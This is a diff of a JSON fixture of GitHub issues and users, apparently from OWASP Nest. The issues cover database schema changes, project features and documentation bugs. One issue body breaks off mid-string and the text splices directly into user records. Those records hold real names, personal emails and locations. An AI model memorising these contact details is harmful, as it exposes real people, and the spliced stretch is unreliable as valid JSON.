maintainers. Address any feedback or required modifications to ensure the quality and maintainability of the code.\n\n8. **Document Changes**: Update the documentation to reflect the changes made. This includes any new features, alterations in existing functionality, and instructions for developers and users.\n\n9. **Prepare for Release**: Once all changes have been implemented and reviewed, prepare a release candidate that includes all the ported changes. Ensure that it is properly versioned and tagged in the repository.\n\n10. **Monitor and Iterate**: After the release, monitor the application for any issues that arise from the ported changes. Be prepared to make further adjustments and optimizations based on user feedback and system performance.\n\nBy following these steps, you can systematically approach the porting of changes from Dependency-Track to Hyades while ensuring a thorough and organized process.", "state": "open", @@ -170268,7 +170279,7 @@ "comments_count": 0, "closed_at": null, "created_at": "2024-06-24T11:29:58Z", - "updated_at": "2024-09-18T15:25:22Z", + "updated_at": "2024-09-22T15:16:28Z", "author": 1248, "repository": 1391, "assignees": [], @@ -170283,7 +170294,7 @@ "pk": 5620, "fields": { "nest_created_at": "2024-09-12T02:14:18.391Z", - "nest_updated_at": "2024-09-18T19:07:39.339Z", + "nest_updated_at": "2024-09-19T07:35:31.424Z", "node_id": "I_kwDOIGVE5s6Q8mbw", "title": "Convert `DIRECT_DEPENDENCIES` columns to `JSONB`", "body": "### Current Behavior\r\n\r\nThe `DIRECT_DEPENDENCIES` column in the `PROJECT` and `COMPONENT` tables are currently of type `TEXT`. For the `COMPONENT` table, there is a `GIN_TRGM_OPS` index on the column:\r\n\r\nhttps://github.com/DependencyTrack/hyades/blob/96af03d19b004a2c41763dabbb7d082180c99e3c/commons-persistence/src/main/resources/schema.sql#L809-L810\r\n\r\nIn order to perform dependency graph traversal, queries are using `LIKE '%...%'` conditions such as:\r\n\r\n```sql\r\n\"COMPONENT\".\"DIRECT_DEPENDENCIES\" LIKE '%48d6c78d-5099-48c8-9bab-2038a5f177e4%'\r\n```\r\n\r\nWhile this works, there are more efficient ways to achieve the desired outcome in PostgreSQL.\r\n\r\n### Proposed Behavior\r\n\r\nConvert the `DIRECT_DEPENDENCIES` column in the `PROJECT` and `COMPONENT` tables to `JSONB`.\r\n\r\nDrop the existing `COMPONENT_DIRECT_DEPENDENCIES_GIN_IDX` index, and create a new one using `JSONB_PATH_OPS`, for example:\r\n\r\n```sql\r\nCREATE INDEX \"COMPONENT_DIRECT_DEPENDENCIES_JSONB_IDX\" ON \"COMPONENT\"\r\nUSING GIN(\"DIRECT_DEPENDENCIES\" JSONB_PATH_OPS);\r\n```\r\n\r\nIt will then be possible to leverage that index using the JSONB *contains* operator:\r\n\r\n```sql\r\nSELECT \"NAME\"\r\n FROM \"COMPONENT\"\r\n WHERE \"DIRECT_DEPENDENCIES\" @> '[{\"uuid\": \"92efe3bd-808d-413a-993e-689c1f35713a\"}]'::jsonb;\r\n```\r\n\r\n> [!WARNING]\r\n> To make DataNucleus work with JSONB columns, `insert-function` and `update-function` extensions must be configured: https://github.com/DependencyTrack/hyades/issues/1074#issuecomment-2198219236\r\n\r\n> [!WARNING]\r\n> There might be multiple queries across the code base that perform `LIKE` queries on the `DIRECT_DEPENDENCIES` column. Some may use JDOQL (i.e. `directDependencies.contains(\"...\")`). In particular the latter is problematic, since JDOQL doesn't support the `@>` JSON operator. Track those queries down, and investigate whether they can be refactored accordingly.\r\n\r\n#### Demo\r\n\r\n> [!NOTE]\r\n> The test database contains 1000 projects and TODO components. [Generated testdata BOMs](https://github.com/DependencyTrack/hyades/tree/main/testdata/boms/generated) were used to populate the database.\r\n\r\nQuery plan using existing `TEXT` column:\r\n\r\n```\r\n+--------------------------------------------------------------------------------------------------------------------------------------------------+\r\n|QUERY PLAN |\r\n+--------------------------------------------------------------------------------------------------------------------------------------------------+\r\n|Bitmap Heap Scan on \"COMPONENT\" (cost=621.77..665.18 rows=11 width=14) (actual time=7.739..17.003 rows=3 loops=1) |\r\n| Recheck Cond: (\"DIRECT_DEPENDENCIES\" ~~ '%ed521419-f3ac-4331-ac93-7219b5420133%'::text) |\r\n| Rows Removed by Index Recheck: 14 |\r\n| Heap Blocks: exact=17 |\r\n| -> Bitmap Index Scan on \"COMPONENT_DIRECT_DEPENDENCIES_GIN_IDX\" (cost=0.00..621.77 rows=11 width=0) (actual time=7.551..7.551 rows=17 loops=1)|\r\n| Index Cond: (\"DIRECT_DEPENDENCIES\" ~~ '%ed521419-f3ac-4331-ac93-7219b5420133%'::text) |\r\n|Planning Time: 0.427 ms |\r\n|Execution Time: 17.213 ms |\r\n+--------------------------------------------------------------------------------------------------------------------------------------------------+\r\n```\r\n\r\nSize of index `COMPONENT_DIRECT_DEPENDENCIES_GIN_IDX`:\r\n\r\n```sql\r\nSELECT pg_size_pretty(pg_relation_size(indexrelid)) \"Index Size\"\r\n FROM pg_stat_all_indexes i\r\n INNER JOIN pg_class c\r\n ON i.relid=c.oid\r\n WHERE i.relname='COMPONENT'\r\n AND indexrelname = 'COMPONENT_DIRECT_DEPENDENCIES_GIN_IDX';\r\n\r\n106 MB\r\n```\r\n\r\nQuery plan using `JSONB` column:\r\n\r\n```\r\n+----------------------------------------------------------------------------------------------------------------------------------------------------+\r\n|QUERY PLAN |\r\n+----------------------------------------------------------------------------------------------------------------------------------------------------+\r\n|Bitmap Heap Scan on \"COMPONENT\" (cost=41.29..10042.07 rows=3823 width=14) (actual time=0.130..0.135 rows=3 loops=1) |\r\n| Recheck Cond: (\"DIRECT_DEPENDENCIES\" @> '[{\"uuid\": \"ed521419-f3ac-4331-ac93-7219b5420133\"}]'::jsonb) |\r\n| Heap Blocks: exact=3 |\r\n| -> Bitmap Index Scan on \"COMPONENT_DIRECT_DEPENDENCIES_JSONB_IDX\" (cost=0.00..40.33 rows=3823 width=0) (actual time=0.010..0.010 rows=3 loops=1)|\r\n| Index Cond: (\"DIRECT_DEPENDENCIES\" @> '[{\"uuid\": \"ed521419-f3ac-4331-ac93-7219b5420133\"}]'::jsonb) |\r\n|Planning Time: 0.100 ms |\r\n|Execution Time: 0.163 ms |\r\n+----------------------------------------------------------------------------------------------------------------------------------------------------+\r\n```\r\n\r\nSize of index `COMPONENT_DIRECT_DEPENDENCIES_JSONB_IDX`:\r\n\r\n```sql\r\nSELECT pg_size_pretty(pg_relation_size(indexrelid)) \"Index Size\"\r\n FROM pg_stat_all_indexes i\r\n INNER JOIN pg_class c\r\n ON i.relid=c.oid\r\n WHERE i.relname='COMPONENT'\r\n AND indexrelname = 'COMPONENT_DIRECT_DEPENDENCIES_JSONB_IDX';\r\n\r\n21 MB\r\n```\r\n\r\n### Checklist\r\n\r\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/hyades/blob/main/CONTRIBUTING.md#filing-issues)\r\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/hyades/issues) for whether this enhancement was already requested", @@ -170307,9 +170318,9 @@ ], "labels": [ 873, + 894, 875, - 877, - 894 + 877 ] } }, @@ -170318,23 +170329,23 @@ "pk": 5621, "fields": { "nest_created_at": "2024-09-12T02:14:21.098Z", - "nest_updated_at": "2024-09-12T02:14:21.098Z", + "nest_updated_at": "2024-09-20T18:27:43.372Z", "node_id": "I_kwDOIGVE5s6Q9nGD", "title": "Use native `UUID` type for UUID colums", "body": "### Current Behavior\n\nUUID columns such as `COMPONENT.UUID` are currently stored as `VARCHAR(36)`. Behind the scenes, `VARCHAR(36)` is just a regular `TEXT` column with a length constraint. It doesn't limit the actual size of the column.\r\n\r\nPostgreSQL has a native `UUID` type that takes less storage space (16bytes fixed) and yields better performance when indexed.\n\n### Proposed Behavior\n\nConvert all UUID columns to the native `UUID` type.\r\n\r\n> [!WARNING]\r\n> To make this work with DataNucleus, `uuid` fields of persistent classes will need to be specified with `@Column(sqlType = \"UUID\")` (https://github.com/datanucleus/datanucleus-rdbms/issues/276).\r\n\r\nUseful references:\r\n\r\n* \r\n* \n\n### Checklist\n\n- [X] I have read and understand the [contributing guidelines](https://github.com/DependencyTrack/hyades/blob/main/CONTRIBUTING.md#filing-issues)\n- [X] I have checked the [existing issues](https://github.com/DependencyTrack/hyades/issues) for whether this enhancement was already requested", "summary": "Convert all UUID columns, including `COMPONENT.UUID`, from `VARCHAR(36)` to the native `UUID` type in PostgreSQL to optimize storage and performance. Ensure that persistent class `uuid` fields are annotated with `@Column(sqlType = \"UUID\")` to maintain compatibility with DataNucleus. Implement this enhancement to leverage the fixed 16-byte storage and improve indexing efficiency.", "hint": "To approach the problem of converting UUID columns from `VARCHAR(36)` to the native `UUID` type in your database, you can follow these steps:\n\n1. **Review Current Database Schema**: Examine the existing database schema to identify all columns currently using `VARCHAR(36)` for UUIDs. Document their locations and usage.\n\n2. **Backup Database**: Before making any changes, create a complete backup of the database to prevent data loss in case of errors during the conversion process.\n\n3. **Analyze Impact on Application Code**: Investigate how the application interacts with the database. Identify areas that will be affected by the change from `VARCHAR(36)` to `UUID`, particularly in data retrieval and persistence logic.\n\n4. **Update DataNucleus Configuration**: Modify the persistent classes in the application code to specify the UUID fields with the `@Column(sqlType = \"UUID\")` annotation to ensure compatibility with the new column type.\n\n5. **Create Migration Script**: Write a migration script to alter the existing UUID columns in the database. This script should include:\n - Dropping the existing `VARCHAR(36)` columns.\n - Adding new columns of type `UUID`.\n - Migrating existing UUID values from the old columns to the new ones, ensuring proper formatting.\n\n6. **Test Migration Script**: Before applying the migration to the production database, test the migration script on a staging or development environment to ensure it works correctly without data loss.\n\n7. **Apply Migration to Production**: Once testing is successful, apply the migration script to the production database.\n\n8. **Update Application Logic**: Modify any application logic that deals with UUID creation, retrieval, or manipulation to ensure that it works seamlessly with the new UUID data type.\n\n9. **Run Tests**: Execute existing unit and integration tests to verify that the application functions correctly with the updated database schema. Pay special attention to any areas that interact with UUID columns.\n\n10. **Monitor After Deployment**: After deployment, monitor the application for any issues or performance improvements related to the change. Be prepared to address any unforeseen issues that may arise.\n\nBy following these steps, you can successfully transition your UUID columns from `VARCHAR(36)` to the native `UUID` type in a structured and safe manner.", - "state": "open", - "state_reason": "reopened", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/DependencyTrack/hyades/issues/1417", "number": 1417, "sequence_id": 2432070019, "is_locked": false, "lock_reason": "", - "comments_count": 2, - "closed_at": null, + "comments_count": 3, + "closed_at": "2024-09-19T10:35:12Z", "created_at": "2024-07-26T11:51:56Z", - "updated_at": "2024-08-23T15:38:43Z", + "updated_at": "2024-09-19T10:35:12Z", "author": 1248, "repository": 1391, "assignees": [ @@ -170342,9 +170353,9 @@ ], "labels": [ 873, + 894, 875, - 877, - 894 + 877 ] } }, @@ -170406,11 +170417,11 @@ 2509 ], "labels": [ + 901, 873, + 906, 875, - 894, - 901, - 906 + 894 ] } }, @@ -176915,7 +176926,7 @@ "pk": 5845, "fields": { "nest_created_at": "2024-09-12T02:19:37.198Z", - "nest_updated_at": "2024-09-18T19:08:29.561Z", + "nest_updated_at": "2024-09-22T19:44:11.665Z", "node_id": "I_kwDOA8C_xs6UcGkM", "title": "Feature Enhancement: AI-Powered Project Summary and Labeling", "body": "#### Objective:\r\nEnhance the existing project section in the OWASP BLT project to automatically collect, analyze, and summarize information from project repositories using AI. This feature will generate a concise summary of each project, along with searchable labels to improve discoverability and usability.\r\n\r\n#### Detailed Description:\r\n\r\n1. **Repository Data Collection:**\r\n - Implement a system to regularly fetch and update data from project repositories. This data can include README files, documentation, commit messages, and issue trackers.\r\n - Utilize APIs (such as GitHub, GitLab, etc.) to extract relevant information automatically.\r\n\r\n2. **AI-Powered Project Summarization:**\r\n - Integrate an AI model capable of natural language processing (NLP) to analyze the collected repository data.\r\n - The AI should generate a brief, human-readable summary of each project, focusing on key aspects such as purpose, features, technologies used, and current status.\r\n - Summaries should be automatically updated whenever significant changes occur in the repository.\r\n\r\n3. **Label Generation:**\r\n - Develop an AI-based labeling system that categorizes projects with relevant tags or labels. \r\n - Labels could include technology stacks (e.g., Python, JavaScript), project type (e.g., web application, library, tool), OWASP relevance (e.g., security testing, secure coding), and more.\r\n - These labels should be dynamically updated and allow users to search or filter projects easily.\r\n\r\n4. **Searchable Project Catalog:**\r\n - Enhance the project's section UI/UX to include a search and filter functionality based on the generated summaries and labels.\r\n - Provide users with the ability to quickly find projects relevant to their interests by searching for specific labels or keywords found in the AI-generated summaries.\r\n \r\n5. **Contributors and Links Integration:**\r\n - Maintain the current functionality that displays contributors and repository links.\r\n - Integrate the new summaries and labels alongside this existing information to provide a comprehensive overview of each project.\r\n\r\n6. **Admin and User Feedback Loop:**\r\n - Include a feedback mechanism for project maintainers and users to suggest edits to the AI-generated summaries or labels.\r\n - Allow maintainers to manually adjust summaries and labels if necessary, ensuring the AI output aligns with project goals and descriptions.\r\n\r\n#### Technical Implementation:\r\n\r\n- **Backend:**\r\n - Use Python-based NLP libraries (e.g., spaCy, Hugging Face Transformers) for AI summarization and labeling.\r\n - Implement data collection using repository APIs and schedule regular updates via cron jobs or similar task schedulers.\r\n\r\n- **Frontend:**\r\n - Update the UI to display the AI-generated summaries and labels alongside existing project details.\r\n - Enhance the search functionality to utilize the generated labels and summary content.\r\n\r\n- **Data Storage:**\r\n - Store AI-generated summaries and labels in a database, ensuring they can be efficiently queried and updated.\r\n\r\n- **Performance Considerations:**\r\n - Ensure the AI summarization and labeling processes are optimized for speed, so they do not slow down the user experience.\r\n - Consider using caching strategies for frequently accessed summaries and labels.\r\n\r\n#### Benefits:\r\n\r\n- **Improved Discoverability:**\r\n - Users can quickly find projects that match their interests, improving engagement and collaboration.\r\n\r\n- **Up-to-Date Information:**\r\n - Summaries are kept current with the latest project developments, providing accurate insights.\r\n\r\n- **Enhanced User Experience:**\r\n - Streamlined access to project information, making the OWASP BLT project section more user-friendly and valuable.\r\n\r\n#### Future Enhancements:\r\n\r\n- Expand the AI model to provide insights or predictions about the project’s future trajectory based on the repository activity.\r\n- Introduce advanced filtering options like popularity, recent updates, or specific contributor involvement.\r\n- Implement multilingual support for summarization and labeling to reach a global audience.", @@ -177307,7 +177318,7 @@ "pk": 5859, "fields": { "nest_created_at": "2024-09-12T02:19:59.483Z", - "nest_updated_at": "2024-09-18T19:08:34.026Z", + "nest_updated_at": "2024-09-22T19:44:34.362Z", "node_id": "I_kwDOJGEFIs6R0vOO", "title": "Action is unassigning issues because it's checking the date the issue was opened and not last modified for the time period", "body": "2024-02-07T09:58:32Z 1704 user user open 178.3145306712963 days\r\nunassigning user from 1704", @@ -177335,7 +177346,7 @@ "pk": 5860, "fields": { "nest_created_at": "2024-09-12T02:20:06.151Z", - "nest_updated_at": "2024-09-18T19:08:38.378Z", + "nest_updated_at": "2024-09-22T19:44:41.143Z", "node_id": "I_kwDOJGEDHs5hL90J", "title": "🥓 integrate Bacon into slack so you can type /distribute 10 bacon @user", "body": " :bacon: integrate Bacon into slack so you can type /distribute 10 bacon @user", @@ -177587,7 +177598,7 @@ "pk": 5869, "fields": { "nest_created_at": "2024-09-12T02:20:13.762Z", - "nest_updated_at": "2024-09-18T19:08:39.097Z", + "nest_updated_at": "2024-09-22T19:44:41.855Z", "node_id": "I_kwDOJGEDHs6BDC3g", "title": "Establish Connection with RPC Server for Blockchain Operations", "body": "", @@ -177615,7 +177626,7 @@ "pk": 5870, "fields": { "nest_created_at": "2024-09-12T02:20:18.744Z", - "nest_updated_at": "2024-09-18T19:08:43.204Z", + "nest_updated_at": "2024-09-22T19:44:47.157Z", "node_id": "I_kwDOJGEEds5gIoPQ", "title": "🥓 Allow for the extension to manage bacon tokens", "body": " 🥓 Allow for the extension to manage bacon tokens", @@ -178637,7 +178648,7 @@ "pk": 5906, "fields": { "nest_created_at": "2024-09-12T02:21:12.077Z", - "nest_updated_at": "2024-09-18T19:08:56.762Z", + "nest_updated_at": "2024-09-22T19:45:15.181Z", "node_id": "I_kwDOAGY_Es5pzRUG", "title": "Custom detection points are not looked up for possible responses", "body": "org.owasp.appsensor.analysis.ReferenceAttackAnalysisEngine's method findPossibleResponses doesn't look up also custom detection points for possible responses.\r\nIs this an intended behaviour or it is a bug?\r\n\r\nI have almost ported the code to Javascript. \r\nIn one of my tests, I configured custom detection poin and generate events of it.\r\norg.owasp.appsensor.analysis.ReferenceEventAnalysisEngine in analyze method takes advantage of org.owasp.appsensor.core.configuration.server.ServerConfiguration's findDetectionPoints method which looks up custom detection poins as well. \r\nWhen an attack of this detection point is analyzed by org.owasp.appsensor.analysis.ReferenceAttackAnalysisEngine, it doesn't \r\nfind possible response and corresponding generated response's action is empty.\r\n\r\nThank you very much for your great code.\r\n\r\nKind regards,\r\nSpas Iliev", @@ -178863,7 +178874,7 @@ "pk": 5914, "fields": { "nest_created_at": "2024-09-12T02:21:36.660Z", - "nest_updated_at": "2024-09-18T19:09:01.082Z", + "nest_updated_at": "2024-09-22T19:45:25.410Z", "node_id": "I_kwDOAfj9Q86TWocv", "title": "Regression: the 1.3.0 release has broken the generation of the OSGi-compliant MANIFEST.MF file", "body": "The changes from PR #39 are not working anymore in the 1.3.0 release. All of the OSGi related entries are missing from the final MANIFEST.MF file. This means that the 1.3.0 version of the library can not be used in an OSGi environment anymore.\r\n", @@ -178891,7 +178902,7 @@ "pk": 5915, "fields": { "nest_created_at": "2024-09-12T02:21:46.104Z", - "nest_updated_at": "2024-09-18T19:09:05.670Z", + "nest_updated_at": "2024-09-22T19:45:34.022Z", "node_id": "I_kwDOBXDIEs5pd4Ms", "title": "Wrong usage of JS functions (Appendix: Leveraging Dev Tools - Encoding and Decoding)", "body": "**What's the issue?**\r\n\r\nIn [Appendix: Leveraging Dev Tools > Encoding and Decoding](https://owasp.org/www-project-web-security-testing-guide/stable/6-Appendix/F-Leveraging_Dev_Tools#encoding-and-decoding):\r\n\r\n- Suggesting use of `escape()` and `unescape()` JavaScript functions for HTML encoding/decoding, while:\r\n - these functions do not actually encode/decode HTML in the traditional sense (HTML entities). Actual behavior:\r\n\r\n ```\r\n > escape(\"", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 132, - "public_gists_count": 1, - "public_repositories_count": 63, - "created_at": "2019-10-05T06:32:26Z", - "updated_at": "2024-09-18T08:06:30Z", - "node_id": "MDQ6VXNlcjU2MTg1OTcy", - "bio": "Cyber Security \"Engine|Pentest|Research|Lead\"er", - "is_hireable": true, - "twitter_username": "dmdhrumilmistry" + "nest_created_at": "2024-09-22T02:47:18.224Z", + "nest_updated_at": "2024-09-22T15:26:35.263Z", + "contributions_count": 13, + "repository": 3, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 10, "fields": { - "nest_created_at": "2024-09-11T19:13:30.239Z", - "nest_updated_at": "2024-09-11T19:13:30.239Z", - "name": "", - "login": "henning410", - "email": "henning1.weise@web.de", - "avatar_url": "https://avatars.githubusercontent.com/u/44315209?v=4", - "company": "", - "location": "Germany", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2018-10-20T09:21:35Z", - "updated_at": "2024-08-02T14:10:33Z", - "node_id": "MDQ6VXNlcjQ0MzE1MjA5", - "bio": "M.Sc. Applied Computer Science Student", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:18.551Z", + "nest_updated_at": "2024-09-22T15:26:35.577Z", + "contributions_count": 3, + "repository": 3, + "user": 3280 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 11, "fields": { - "nest_created_at": "2024-09-11T19:13:31.550Z", - "nest_updated_at": "2024-09-18T17:29:31.455Z", - "name": "", - "login": "jIgnoul", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/113015081?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-09-07T08:03:25Z", - "updated_at": "2024-08-21T13:50:37Z", - "node_id": "U_kgDOBrx5KQ", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:21.395Z", + "nest_updated_at": "2024-09-22T15:26:38.441Z", + "contributions_count": 13, + "repository": 4, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 12, "fields": { - "nest_created_at": "2024-09-11T19:14:34.160Z", - "nest_updated_at": "2024-09-18T19:02:37.512Z", - "name": "Aaron G", - "login": "scriptingxss", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/18707651?v=4", - "company": "", - "location": "Los Angeles", - "collaborators_count": 0, - "following_count": 5, - "followers_count": 131, - "public_gists_count": 0, - "public_repositories_count": 56, - "created_at": "2016-04-27T20:10:12Z", - "updated_at": "2024-08-20T00:02:37Z", - "node_id": "MDQ6VXNlcjE4NzA3NjUx", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:21.708Z", + "nest_updated_at": "2024-09-22T15:26:38.778Z", + "contributions_count": 1, + "repository": 4, + "user": 3192 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 13, "fields": { - "nest_created_at": "2024-09-11T19:14:37.597Z", - "nest_updated_at": "2024-09-18T18:53:02.145Z", - "name": "Luca Pascal Rotsch", - "login": "rockhoppersec", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/112620456?v=4", - "company": "", - "location": "Germany", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-09-01T09:19:53Z", - "updated_at": "2024-06-29T13:06:37Z", - "node_id": "U_kgDOBrZzqA", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:24.487Z", + "nest_updated_at": "2024-09-22T15:26:41.564Z", + "contributions_count": 13, + "repository": 5, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 14, "fields": { - "nest_created_at": "2024-09-11T19:15:28.507Z", - "nest_updated_at": "2024-09-18T17:30:43.229Z", - "name": "Mohammed Janibasha", - "login": "janibashamd", - "email": "jani.basha.5000@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6093830?v=4", - "company": "None", - "location": "hyderabad", - "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2013-12-03T09:15:14Z", - "updated_at": "2024-09-13T12:05:06Z", - "node_id": "MDQ6VXNlcjYwOTM4MzA=", - "bio": "Cloud Security | OWASP | Python | Devops | WAF | Bot Defense | k8s", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:24.843Z", + "nest_updated_at": "2024-09-22T15:26:41.880Z", + "contributions_count": 1, + "repository": 5, + "user": 452 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 15, "fields": { - "nest_created_at": "2024-09-11T19:16:13.683Z", - "nest_updated_at": "2024-09-11T19:16:13.683Z", - "name": "Vishwas Manral", - "login": "vishwasmanral", - "email": "vishwas.manral@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6797778?v=4", - "company": "", - "location": "San Jose, CA", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-02-26T20:13:14Z", - "updated_at": "2024-01-09T20:08:58Z", - "node_id": "MDQ6VXNlcjY3OTc3Nzg=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:25.156Z", + "nest_updated_at": "2024-09-22T15:26:42.191Z", + "contributions_count": 1, + "repository": 5, + "user": 3192 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 16, "fields": { - "nest_created_at": "2024-09-11T19:16:14.096Z", - "nest_updated_at": "2024-09-11T19:16:22.219Z", - "name": "Andy", - "login": "rot169", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59445582?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2020-01-02T14:55:54Z", - "updated_at": "2024-08-10T17:12:49Z", - "node_id": "MDQ6VXNlcjU5NDQ1NTgy", - "bio": "", - "is_hireable": false, - "twitter_username": "rot169" + "nest_created_at": "2024-09-22T02:47:27.959Z", + "nest_updated_at": "2024-09-22T15:26:45.235Z", + "contributions_count": 13, + "repository": 6, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 17, "fields": { - "nest_created_at": "2024-09-11T19:16:15.828Z", - "nest_updated_at": "2024-09-18T17:31:20.725Z", - "name": "Ads Dawson", - "login": "GangGreenTemperTatum", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104169244?v=4", - "company": "@cohere-ai ", - "location": "Earth", - "collaborators_count": 0, - "following_count": 20, - "followers_count": 6, - "public_gists_count": 6, - "public_repositories_count": 46, - "created_at": "2022-04-21T20:21:33Z", - "updated_at": "2024-09-07T13:24:50Z", - "node_id": "U_kgDOBjV_HA", - "bio": "AppSec, LLM AppSec, MLSecOps, slurpin' noods 🍜 \r\n..\r\nOWASP Top 10 for LLM Applications and Generative AI Tech Lead", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:28.283Z", + "nest_updated_at": "2024-09-22T15:26:45.553Z", + "contributions_count": 6, + "repository": 6, + "user": 3281 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 18, "fields": { - "nest_created_at": "2024-09-11T19:16:16.230Z", - "nest_updated_at": "2024-09-11T19:16:41.269Z", - "name": "John Sotiropoulos", - "login": "jsotiro", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2410281?v=4", - "company": "", - "location": "United Kingdom", - "collaborators_count": 0, - "following_count": 2, - "followers_count": 9, - "public_gists_count": 3, - "public_repositories_count": 37, - "created_at": "2012-09-24T09:05:36Z", - "updated_at": "2024-07-31T22:18:51Z", - "node_id": "MDQ6VXNlcjI0MTAyODE=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:31.097Z", + "nest_updated_at": "2024-09-22T15:26:48.306Z", + "contributions_count": 13, + "repository": 7, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 19, "fields": { - "nest_created_at": "2024-09-11T19:16:19.590Z", - "nest_updated_at": "2024-09-11T19:16:36.601Z", - "name": "Bob Simonoff", - "login": "Bobsimonoff", - "email": "bob.simonoff@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/139978786?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2023-07-19T12:31:06Z", - "updated_at": "2024-01-03T12:54:38Z", - "node_id": "U_kgDOCFfoIg", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:34.025Z", + "nest_updated_at": "2024-09-22T15:26:51.066Z", + "contributions_count": 13, + "repository": 8, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 20, "fields": { - "nest_created_at": "2024-09-11T19:16:25.606Z", - "nest_updated_at": "2024-09-11T19:17:06.318Z", - "name": "Jason Ross", - "login": "rossja", - "email": "algorythm@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/230677?v=4", - "company": "", - "location": "Rochester, NY", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 173, - "public_gists_count": 19, - "public_repositories_count": 212, - "created_at": "2010-03-26T03:05:01Z", - "updated_at": "2024-08-27T02:01:09Z", - "node_id": "MDQ6VXNlcjIzMDY3Nw==", - "bio": "see: https://jasonross.info", - "is_hireable": false, - "twitter_username": "rossja" + "nest_created_at": "2024-09-22T02:47:34.336Z", + "nest_updated_at": "2024-09-22T15:26:51.394Z", + "contributions_count": 1, + "repository": 8, + "user": 215 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 21, "fields": { - "nest_created_at": "2024-09-11T19:16:27.309Z", - "nest_updated_at": "2024-09-11T19:16:27.309Z", - "name": "Nicholas Grove", - "login": "nicholasgrove", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61357626?v=4", - "company": "@OWASP, @PSF, @EFForg, @Microsoft", - "location": "USA, Europe, East Asia", - "collaborators_count": 0, - "following_count": 12, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-02-22T16:31:35Z", - "updated_at": "2023-12-13T01:29:34Z", - "node_id": "MDQ6VXNlcjYxMzU3NjI2", - "bio": "Security \\ Cloud \\ AI Engineer @microsoft • I ❤️ you, open source community.", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:47:37.198Z", + "nest_updated_at": "2024-09-22T15:26:54.210Z", + "contributions_count": 13, + "repository": 9, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 22, "fields": { - "nest_created_at": "2024-09-11T19:16:29.416Z", - "nest_updated_at": "2024-09-11T19:17:09.689Z", - "name": "Steve Wilson", - "login": "virtualsteve-star", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/62770473?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 14, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-03-27T19:35:56Z", - "updated_at": "2024-07-26T04:20:28Z", - "node_id": "MDQ6VXNlcjYyNzcwNDcz", - "bio": "Chief Product Officer at Contrast Security. Author of \"AI and Cybersecurity\", \"The Father/Daughter Guide to Crypto Mining\" and \"Java Platform Performance\"", - "is_hireable": false, - "twitter_username": "virtualsteve" + "nest_created_at": "2024-09-22T02:47:37.531Z", + "nest_updated_at": "2024-09-22T15:26:54.530Z", + "contributions_count": 3, + "repository": 9, + "user": 3282 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 23, "fields": { - "nest_created_at": "2024-09-11T19:16:46.359Z", - "nest_updated_at": 